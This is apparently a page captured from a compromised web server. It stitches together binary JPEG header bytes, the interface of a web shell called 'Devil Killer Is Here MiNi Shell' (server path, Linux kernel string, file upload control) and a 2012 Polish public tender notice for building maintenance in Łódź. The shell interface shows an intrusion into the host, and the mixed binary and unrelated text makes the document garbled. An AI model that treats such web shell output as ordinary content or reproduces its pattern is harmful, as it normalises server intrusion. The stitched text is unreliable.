JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120606/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120606/125201-N-2012.html

<p class="kh_header"><b>Łódź: Usługi konserwacji ogólnobudowlanej w administrowanych nieruchomosciach</b><br>
<b>Numer ogłoszenia: 125201 - 2012; data zamieszczenia: 06.06.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Administracja Nieruchomościami Łódź-Górna "Wschód" , ul. Lubelska 9/11, 93-129 Łódź, woj. łódzkie, tel. 42 6847601, faks 42 6847576.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.wschod.com3.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Usługi konserwacji ogólnobudowlanej w administrowanych nieruchomosciach.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiotem postępowania jest udzielenie zamówienia na świadczenie na rzecz Zamawiającego usługi w zakresie określonym w ust. 2-3.
2. Przedmiotem zamówienia są usługi konserwacji ogólnobudowlanej świadczone w ramach 
    pogotowia (wymagana 24 godzinna gotowość) w nieruchomościach administrowanych przez      
    Zamawiającego oraz w lokalach gminnych administrowanych przez Zamawiającego w budynkach 
    Wspólnot Mieszkaniowych ujęte w dwóch częściach (rejon Nr 1 i  Nr 2) - zgodnie z wykazem 
    nieruchomości objętych zamówieniem stanowiącym załącznik nr 2 do niniejszej Specyfikacji 
    Istotnych Warunków Zamówienia, w oparciu o zakresy czynności (formularze cenowe) będące 
    cennikami przedmiotowych usług stanowiące załączniki Nr 1 (Rejon 1)  i Nr 1A (Rejon 2) do 
    niniejszej Specyfikacji Istotnych Warunków Zamówienia, obejmujące w swoim zakresie 
    następujące czynności:

  2.1. czyszczenie kieli i rynien z liści;
  2.2. rozebranie rynien z blachy nie nadającej się do użytku;
  2.3. naprawa rynien bez zdejmowania przez sprawdzenie i polutowanie pęknięć;                        
  2.4. uzupełnienie rynien z blachy ocynkowanej wiszących w odcinkach o długości ponad 1mb i 
         średnicy 15 cm;
  2.5. uzupełnienie rynien za wykonanie koszy z blachy ocynkowanej;
  2.6. uzupełnienie rynien - wykonanie wpustów (sztucerów) z blachy ocynkowanej;
  2.7. wymiana haka rynnowego;
  2.8. sprawdzenie, wyprostowanie, polutowanie uszkodzeń rur spustowych, umocowanie     
         obruszonych uchwytów;
  2.9. uzupełnienie kolanek lub załamań z blachy ocynkowanej;
2.10. uzupełnienie rynien z blachy ocynkowanej wiszących w odcinkach o długości ponad 1mb i 
         średnicy 12 cm;
   2.11. demontaż i ponowny montaż rur spustowych (nie wymienialnych);
   2.12. wymiana rury spustowej z blachy ocynkowanej na rury z PCV;
   2.13. wymiana uchwytów do rur spustowych;
2.14.  wymiana rury deszczowej z osadnikiem;
2.15. wymiana rury deszczowej z osadnikiem na PCV;
2.16. uzupełnienie obróbek blacharskich murów ogniowych, koszów i okapów z blachy ocynkowanej;
   2.17. wymiana obróbek blacharskich murów ogniowych, pasów nad i podrynnowych, wyskoków i 
            pasów elewacji, gzymsów, krawędzi balkonowych oraz listew dociskowych  z blachy 
            ocynkowanej;
2.18. montaż listew dociskowych z blachy ocynkowanej;
2.19. doszczelnienie silikonem listew dociskowych z blachy ocynkowanej;
2.20. rozbiórka pokrycia z papy;
2.21. sprzątanie i zamiatanie połaci dachowej (nie dotyczy okresu zimowego i usuwania śniegu);
2.22. wykonanie i rozebranie prowizorycznego zabezpieczenia dachowego;
2.23. drobne naprawy pokrycia papowego polegające na umocowaniu pokrycia i zakitowaniu;
2.24. uzupełnienie obróbek papą asfaltową: mury ogniowe, gzymsy okapy, kosze, kołnierze;
2.25. pokrycie na lepiku w nakładkę, na dachu dawniej krytych papą na zimno;
2.26. uzupełnienie pokryć z 1 warstwy papy asfaltowej na klapach kominiarskich;
2.27. posmarowanie powierzchni dachu lepikiem asfaltowym;
2.28. posmarowanie powierzchni dachu abizolem D, z zakitowaniem uszkodzeń;
2.29. pokrycie dachów o pow. do 100 m2 papą zgrzewalną - naprawa pokrycia z papy
         termozgrzewalnej, przyklejenie łat z papy termozgrzewalnej wierzchniego krycia grub. 4,7 mm 
         wraz z przygotowaniem podłoża;
2.30. naprawa pokryć dachowych papą termozgrzewalną (obróbki z papy /kołnierze/ elem. metalowe, 
         występujące na dachu wraz z oczyszczeniem zaimpregnowaniem);
2.31. przemurowanie przewodów kominowych - wykucie otworów;
2.32. obsadzenie kratek wentylacyjnych, drzwiczek wyczystkowych w ścianach z cegieł;
2.33. wykucie z muru kratek wentylacyjnych, drzwiczek;
2.34. przemurowanie przewodów kominowych - zamurowanie otworów;
2.35. przemurowanie kominów o objęt. powyżej 0,5 m3;
2.36. przemurowanie kominów o objęt. do  0,5 m3;
2.37. wykucie bruzd pionowych 1* ? ceg. w ścianach z cegieł na zaprawie cementowo- 
         wapiennej;
2.38. zamurowanie bruzd pionowych lub pochyłych o przekroju ? *1 ceg. w ścianach z cegieł;
2.39. przemurowanie ciągłe pęknięć o głębokości ? cegły przy użyciu zaprawy cementowej w 
         ścianach na zaprawie cem - wapiennej;
2.40. uzupełnienie ścianek z cegieł grubości ? cegły w ścianach z cegieł na zaprawie cem - 
         wapiennej;
2.41. uzupełnienie ścian lub zamurowanie otworów w ścianach na zaprawie cem - wap. cegłami;
2.42. przemurowanie ścianek z cegieł o grubości ? cegły na zaprawie cem - wapiennej do ościeży lub    
         powierzchni ścian;
2.43. obsadzenie ościeżnic stalowych w ścianach z cegieł wraz z zakupem ościeżnicy;
2.44. obsadzenie ościeżnic drewnianych w ścianach wewnętrznych z cegieł;
2.45. obsadzenie ościeżnic drewnianych w ścianach zewnętrznych  z cegieł;
2.46. odbicie tynków z zaprawy wapiennej lub cem.- wapiennej na ścianach, filarach, pilastrach;   
2.47. odbicie tynków z zaprawy wapiennej lub cem.- wapiennej na stropach płaskich, belkach i 
         schodach;
2.48. uzupełnienie tynków zwykłych wewnętrznych kat. III o pow. do 5 m2 z zaprawy cement.- 
         wapiennej na ścianach ceramicznych, betonowych, z płyt wiórowo - cement. zagrunt. siatką;
2.49. uzupełnienie tynków zwykłych wewnętrznych kat. III o pow. do 5 m2 z zaprawy cement. -
         wapiennej na stropach ceramicznych, betonowych, podciągach, belkach, biegach schodowych, 
         płytach wiórowo- cementowych;
2.50. uzupełnienie tynków zewnętrznych  kat. III z zaprawy cem.- wapiennej o powierzchni do 5 m2;
2.51. uzupełnienie tynków na kominach ponad dachem;
2.52. przecieranie tynków na kominach ponad dachem;
2.53. wykonanie tynków zwykłych na kominach ponad dachem;
2.54. wykonanie tynków wewnętrznych z zaprawy cem - wapiennej na ościeżach do 25 cm;
2.55. wzmocnienie krokwi przez nabicie dwustronne desek grub. 32 mm.;
2.56. wymiana deskowania dachu z desek o grub. 25 mm. na styk;
2.57. wymiana jednostronnego odeskowania ścian z desek niestruganych o grub..25 mm.;
2.58. podstemplowanie zagrożonych stropów pojedynczymi stemplami;
2.59. podstemplowanie zagrożonych stropów z deskowaniem;
2.60. podstemplowanie zagrożonych nadproży;
2.61. uzupełnienie wyłazów kominiarskich;
2.62. wymiana elementów schodów drewnianych - poręczy;
2.63. wymiana elementów schodów drewnianych - podstopnic;
2.64. wymiana elementów schodów drewnianych - stopnic;
2.65. wymiana elementów schodów drewnianych - słupków;
2.66. wymiana elementów schodów drewnianych - tralek;
2.67. wymiana desek podłogowych w ilośći do 2 m2 w jednym miejscu;
2.68. przybicie do podłóg, zabicie otworów drzwiowych i okiennych  płytami  pilśniowymi;
2.69. obicie blachą ocynkowaną drewnianych powierzchni okiennic, drzwi, okien, podłóg;
2.70. dopasowanie skrzydeł drzwiowych wewnętrznych, zewnętrznych i balkonowych  jako oddzielna 
         praca - nie dotyczy robót związanych z wymianą okuć oraz elementów stolarki;
2.71. uzupełnienie posadzki cementowej o pow. 1,0 - 5,0 m2 w jednym miejscu z zatarciem na ostro;
2.72. dopasowanie skrzydeł okiennych o pow. 0,5 do 2,5 m2 jako oddzielna praca - nie dotyczy robót 
         związanych z wymianą okuć oraz elementów stolarki;
2.73. wymiana ramiaków skrzydeł okiennych wraz zdopasowaniem stolarki;
2.74. wymiana listew przymykowych skrzydeł okiennych wraz zdopasowaniem stolarki;
2.75. wymiana okapników skrzydeł okiennych wraz zdopasowaniem stolarki;
2.76. wymiana zasuw drzwiowych wraz z dopasowaniem i regulacją skrzydeł;
2.77. wymiana zamków wpuszczanych wraz z dopasowaniem i regulacją skrzydeł;
2.78. wymiana zawiasów drzwiowych wraz z dopasowaniem i regulacją skrzydeł;
2.79. wymiana zawiasów - montaż skobla wraz z kłódką;
2.80. wymiana oklejenia skrzydeł drzwiowych płytami pilśniowymi o pow.  ponad 1,0m2;
2.81. rozszklenie otworów okiennych lub drzwiowych o ramach drewnianych;
2.82. rozszklenie otworów okiennych lub drzwiowych o ramach metalowych;
2.83. szklenie ram drewn. zdejmowanych - pojedynczych na kit podwójny szkłem płaskim ciągn. 
         2-3 mm  o pow. szyby ponad 0,5 m2;
2.84. szklenie ram metalowych stałych, szkłem gładkim 5 - 8 mm. na uszczelki i listwy o pow. szyby 
         do 4,0 m2;
2.85. uzupełnienie okitowania istniejących szyb o pow. ponad 0,5 m2 w ramach drewnianych;
2.86. rozebranie chodników, wysepek przystankowych, przejść dla pieszych z płyt betonowych 
         50×50×7 cm na podsypce piaskowej;
2.87. wykonanie opaski z płyt betonowych 50x50x7 cm na podsypce cem - piaskowej z wypełnieniem 
         spoin zaprawą cementową przy budynku;
2.88. wykonanie opaski betonowej o szer. 50 cm, na podłożu gruntowym przy budynku;
2.89. wykonanie - montaż ścieku z prefabrykatów betonowych o grub. 15 cm na podsypce 
         cem - piaskowej;
2.90. wymiana lub uzupełnienie krat;
2.91. dwukrotne malowanie farbą olejną  krat, balustrad, bram i furtek z prętów;
2.92. spawanie prętów okrągłych do kształtowników lub płaskowników;
2.93. wymiana lub uzupełnienie ogrodzenia z siatki w ramach na słupkach;
2.94. dwukrotne malowanie tynków zewnętrznych;
2.95. dwukrotne malowanie tynków wewnętrznych farbą emulsyjną;
2.96. dwukrotne malowanie farbą olejną uprzednio malowanej stolarki drzwiowej, ścianek i szafek;
2.97. dwukotne malowanie farbami wapiennymi starych tynków ścian - zamalowanie napisów; 
2.98. dwukrotne malowanie farbami wapiennymi starych tynków wewnętrznych - sufitów;
2.99. montaż pieców lub kuchni przenośnych zakupionych przez zamawiającego; 
         W cenie pozycji należy ująć transport ze sklepu do miejsca montażu oraz cenę rur 
         podłączeniowych  i blachy przedpiecowej.
 2.100. zrzucenie śniegu z dachu /budynki parterowe/ bez jego wywozu;
 2.101. zgarnięcie śniegu i lodu z dachu (z przerzutem) z budynków wyższych od parterowych;
 2.102. skucie lodu na ścianie, z gzymsu, rynien;
 2.103. wygrodzenie strefy niebezpiecznej wraz z oznakowaniem, słupki ograniczające ustawienie i 
            rozebranie;
 2.104. montaż tablic informacyjnych, nr policyjnych lub innych drobnych elementów, 
         (materiały - tablice do montażu dostarcza Zamawiający);
 2.105. rusztowania zewnętrzne, drewniane drabinowe, punktowe;
 2.106. wykonanie rusztowania przy kominach;
 2.107. wykonanie zastaw zabezpieczających na dachu;
 2.108. wykonanie poziomych pomostów na dachu;
 2.109. rozebranie pieców i trzonów kuchennych oblicowanych kaflami;
 2.110. demontaż rurociągu żeliwnego pionowego na ścianie budynku;
 2.111. wywiezienie gruzu na odległość do 15 km;
 2.112. awaryjne otwarcie lokalu;
 2.113. wymiana lub uzupełnienie balustrad schodowych lub balkonowych prostych;
 2.114. montaż pojedyńczych uchwytów do flag wraz z zakupem uchwytów przez Wykonawcę;
 2.115. montaż podwójnych uchwytów do flag wraz z zakupem uchwytów przez Wykonawcę;
 2.116. przemurowanie ścianek z cegieł o grubosci 1ceg. na zaprawie cem - wapiennej do ościeży lub 
            powierzchni ścian;
 2.117. przybicie do podłóg, zabicie otworów okiennych, drzwiowych płytą OSB grub. 20mm;
 2.118. przebicie otworów w ścianach z cegieł o grubości 2ceg. na zaprawie cem-wapiennej dla 
            osadzenia nawiewników podokiennych;
 2.119. nawietrzaki podokienne typ A o wielkości (grub. muru w cegłach) do 2,5;
 2.120. podstawienie drabiny;
 2.121. wymiana zamka w skrzynce na listy;
 2.122. wymiana skrzynki na listy 1-modułowej; 


3. Zamawiający w przedmiocie zamówienia będzie wymagał od Wykonawcy:
a)  24 godzinnej gotowości do wykonywania czynności objętych zamówieniem we wszystkie dni 
     tygodnia na podstawie pisemnych zleceń aministratorów oraz telefonicznych zgłoszeń służb 
     miejskich bądź Zamawiającego;
b)  przystąpienia do wykonywania czynności na podstawie otrzymanych zleceń i telefonicznych 
     zgłoszeń:
     - nie później niż w ciągu trzech godzin od momentu przyjęcia zgłoszenia awarii zagrażającej 
       życiu, zdrowiu lub mieniu najemców Gminy Łódź; 
     - nie później niż w ciągu  25 dni od daty otrzymanego zlecenia pozostałe awarie;
c)  gwarancji na okres min. 6 m-cy, na usługi polegające na wykonaniu pokrycia połaci dachowej w 
     jednym miejscu o powierzchni powyżej 30,00 m2; 
d)  stosowania materiałów budowlanych posiadających atest i deklarację zgodności z obecnie 
     obowiązującymi normami i aprobatami technicznymi;
e)  przestrzegania przepisów bezpieczeństwa i higieny pracy - zgodnie z zasadami bezpieczeństwa i 
     higieny pracy określonymi w Rozporządzeniu Ministra Infrastruktury z dnia 06.02. 2003 r., 
     w sprawie Bezpieczeństwa i higieny pracy podczas wykonywania robót  budowlanych 
     (Dz. U. Nr 47 poz. 401);
f)  odpowiedzialności za całość szkód powstałych na skutek prowadzonych usług;
g)  zachowania praw osób trzecich;
h)  sporządzania zestawień rozliczeniowych z otrzymanych zarejestrowanych zleceń za wykonane 
     czynności usługowe na podstawie faktycznie wykonanych czynności (ilości jednostek 
     miary) i  cen jednostkowych (netto) w oparciu o cennik ryczałtowy cen jednostkowych (netto) - 
     dwa razy w miesiącu,  odrębnie , dla  każdego zlecenia; 
    Zestawienie, które obejmuje: adres nieruchomości, wykaz wykonanych czynności wraz z 
    wbudowanym materiałem na nieruchomości, cenę jednostkową (netto) z cennika ryczałtowego oraz 
    wartość iloczynową zleconej usługi, musi być potwierdzone przez właściwego terenowo  
    administratora i rozliczone przez właściwego inspektora nadzoru, stanowić będzie załącznik do  
    wystawionych przez Wykonawcę faktur odrębnie  dla każdej nieruchomości prywatnej lub 
    współwłasnej oraz łącznie dla nieruchomości gminnych i skarbu państwa; 
  
    W przypadku wykonania czynności usługowych  nie objętych cennikiem ryczałtowym, rozliczenie 
    usługi nastąpi na podstawie kosztorysu powykonawczego sporządzonego w oparciu o KNR-y  z 
    zastosowaniem cen materiałów i pracy sprzętu, nie wyższych od opublikowanych w biuletynie 
    Sekocenbudu i składników cenotwórczych określonych w formularzu ofertowym oferty..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 50.76.00.00-0.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 12.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1. W celu potwierdzenia spełnienia warunków udziału w postępowaniu, o których  mowa 
     w art. 22 ust. 1 Ustawy, który dotyczy:
a)  posiadania wiedzy i doświadczenia,
    Zamawiający żąda od Wykonawcy udokumentowania wiedzy i doświadczenia poprzez wykazanie 
    w zał. nr 4 do niniejszej SIWZ wykonanych usług lub usług w trakcie realizacji w okresie ostatnich 
    trzech lat przed upływem terminu składania ofert, a jeżeli okres działalności jest krótszy - w tym 
    okresie, odpowiadających swoim rodzajem usługom stanowiącym przedmiot zamówienia lub 
    podobnym  z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, w ilości: minimum 
    jednej usługi w okresie 12 m-cy  na kwotę  min. 50.000,00 zł  brutto;
    oraz załączeniem dokumentu potwierdzającego, że wykazane usługi zostały wykonane lub są 
    wykonywane należycie
    Dla usług będących w trakcie realizacji należy załączyć oświadczenie o podpisanej umowie z 
    informacją potwierdzającą, że usługi są wykonywane należycie. Kwota podpisanej umowy nie    
    może być niższa niż kwota określona powyżej.   
    Ocena spełnienia opisanego warunku nastąpi na podstawie przedstawionych przez
    Wykonawców dokumentów i oświadczeń, na zasadzie spełnia/ nie spełnia.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1. W celu potwierdzenia spełnienia warunku udziału w postępowaniu, określonego 
     w art. 22 ust. 1 Ustawy, który dotyczy:
a) dysponowania osobami zdolnymi do wykonania zamówienia,
     Zamawiający żąda od Wykonawcy oświadczenia  zał. nr 5 do SIWZ, że Wykonawca lub osoba 
     uczestnicząca w wykonywaniu zamówienia pełniąca na rzecz Wykonawcy obowiązki kierownika 
     robót - usługi nadzoru nad prowadzonymi robotami posiada:  wymagane uprawnienia budowlane 
     w specjalności konstrukcyjno - budowlanej (wykonawcze), zgodne z art. 12, 13  i 14 ustawy z dnia 
     07.07.1994 r. Prawo Budowlane z późniejszymi zmianami, a także aktualne zaświadczenie tej 
     osoby o przynależności do Okręgowej Izby Inżynierów Budownictwa   oraz załączeniem tych 
     dokumentów.
     Ocena spełnienia opisanego warunku nastąpi na podstawie przedstawionych przez 
     Wykonawców dokumentów i oświadczeń, na zasadzie spełnia/ nie spełnia.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1. W celu potwierdzenia spełnienia warunku udziału w postępowaniu, określonego w art. 22 ust. 1 
    Ustawy, który dotyczy:
a) sytuacji ekonomicznej i finansowej,
    Zamawiający żąda od Wykonawcy,  posiadania ubezpieczenia od odpowiedzialności 
    cywilnej w zakresie prowadzonej działalności na sumę ubezpieczenia nie mniej niż 50 000,00 zł. 
    W przypadku załączenia dokumentu na okres krótszy od terminu zamówienia, do oferty należy 
    dołączyć pisemne zobowiązanie o przedłużeniu ważności ubezpieczenia.      
    Ocena spełnienia opisanego warunku nastąpi na podstawie przedstawionych przez 
    Wykonawców dokumentów i oświadczeń, na zasadzie spełnia/ nie spełnia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
</li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.wschod.com3.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> A.N. Łódź - Górna Wschód, 93-129 Łódź, ul. Lubelska 9/11, pokój 17 w cenie 20,00 zł. (brutto).</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 27.06.2012 godzina 10:00, miejsce: A.N. Łódź - Górna Wschód, 93-129 Łódź, ul. Lubelska 9/11, pokój 17.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





